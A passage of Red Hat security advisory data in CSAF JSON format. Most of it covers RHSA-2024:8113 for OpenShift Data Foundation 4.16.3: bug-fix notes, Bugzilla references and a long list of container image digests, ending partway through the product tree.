"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Envoy crashes for `LocalReply` in HTTP async client", }, ], }
rhsa-2024:8113
Vulnerability from csaf_redhat
Published
2024-10-15 08:52
Modified
2025-04-10 00:22
Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.3 security and bug fix update
Notes
Topic
Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.3 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an
S3 compatible API.
Bug fixes:
* Previously, on the disaster recover (DR) monitoring dashboard, the detail about `Last snapshot synced` was missing for appset based applications. With this fix, the dashboard shows the `lastGroupSyncTime` under the `Volume snapshot` for the selected appset based applications. (BZ#2295324)
* Previously, when OpenShift Data Foundation was installed in a namespace other than `openshift-storage`, such as ROSA, the user interface (UI) labelled the nodes during the StorageSystem deployment and added a dynamic label "cluster.ocs.openshift.io/<CLUSTER_NAMESPACE>: ‘'", where "CLUSTER_NAMESPACE" is the namespace in which the StorageSystem is getting created). However the ODF/OCS operators expected the label to be always a static label, "cluster.ocs.openshift.io/openshift-storage: ‘’.
With this fix, the user interface adds a static label "cluster.ocs.openshift.io/openshift-storage: ‘’ to the nodes and as a result the installation proceeds as expected. (BZ#2303083)
Enhancement:
* In the storage clients table of the Storage clients page of the OpenShift web console, storage cluster name is displayed along with the cluster ID to provide better clarity. (BZ#2304905)
All users of Red Hat OpenShift Data Foundation are advised to upgrade to these updated images, which provide these bug fixes.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.3 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an\nS3 compatible API.\n\nBug fixes:\n\n* Previously, on the disaster recover (DR) monitoring dashboard, the detail about `Last snapshot synced` was missing for appset based applications. With this fix, the dashboard shows the `lastGroupSyncTime` under the `Volume snapshot` for the selected appset based applications. (BZ#2295324)\n\n* Previously, when OpenShift Data Foundation was installed in a namespace other than `openshift-storage`, such as ROSA, the user interface (UI) labelled the nodes during the StorageSystem deployment and added a dynamic label \"cluster.ocs.openshift.io/<CLUSTER_NAMESPACE>: ‘'\", where \"CLUSTER_NAMESPACE\" is the namespace in which the StorageSystem is getting created). However the ODF/OCS operators expected the label to be always a static label, \"cluster.ocs.openshift.io/openshift-storage: ‘’.\nWith this fix, the user interface adds a static label \"cluster.ocs.openshift.io/openshift-storage: ‘’ to the nodes and as a result the installation proceeds as expected. (BZ#2303083)\n\nEnhancement:\n\n* In the storage clients table of the Storage clients page of the OpenShift web console, storage cluster name is displayed along with the cluster ID to provide better clarity. (BZ#2304905)\n\nAll users of Red Hat OpenShift Data Foundation are advised to upgrade to these updated images, which provide these bug fixes.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:8113", url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2283959", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283959", }, { category: "external", summary: "2295324", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2295324", }, { category: "external", summary: "2296521", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2296521", }, { category: "external", summary: "2300333", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300333", }, { category: "external", summary: "2302463", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302463", }, { category: "external", summary: "2303083", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303083", }, { category: "external", summary: "2304905", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304905", }, { category: "external", summary: "2308445", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308445", }, { category: "external", summary: "2310370", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310370", }, { category: "external", summary: "2312055", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312055", }, { category: "external", summary: "2315708", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315708", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8113.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.3 security and bug fix update", tracking: { current_release_date: "2025-04-10T00:22:08+00:00", generator: { date: "2025-04-10T00:22:08+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:8113", initial_release_date: "2024-10-15T08:52:38+00:00", revision_history: [ { date: "2024-10-15T08:52:38+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-15T08:52:38+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:22:08+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHODF 4.16 for RHEL 9", product: { name: "RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16", product_identification_helper: { cpe: "cpe:/a:redhat:openshift_data_foundation:4.16::el9", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Data Foundation", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", product: { name: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", product_id: "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", product: { name: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", product_id: "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", product: { name: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", product_id: "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", product: { name: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", product_id: "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", product: { name: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", product_id: "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", product: { name: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", product_id: "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", product: { name: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", product_id: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", product: { name: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", product_id: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", product: { name: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", product_id: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", product: { name: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", product_id: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", product: { name: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", product_id: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698?arch=s390x&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", product_id: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", product_id: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", product: { name: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", product_id: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4?arch=s390x&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", product: { name: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", product_id: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5?arch=s390x&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", product: { name: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", product_id: "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d?arch=s390x&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", product_id: "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c?arch=s390x&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", product: { name: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", product_id: "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9?arch=s390x&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", product: { name: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", product_id: "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0?arch=s390x&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", product: { name: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", product_id: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5?arch=s390x&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", product: { name: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", product_id: "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356?arch=s390x&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", product: { name: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", product_id: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", product_id: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.16.3-1", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", product: { name: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", product_id: "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", product: { name: 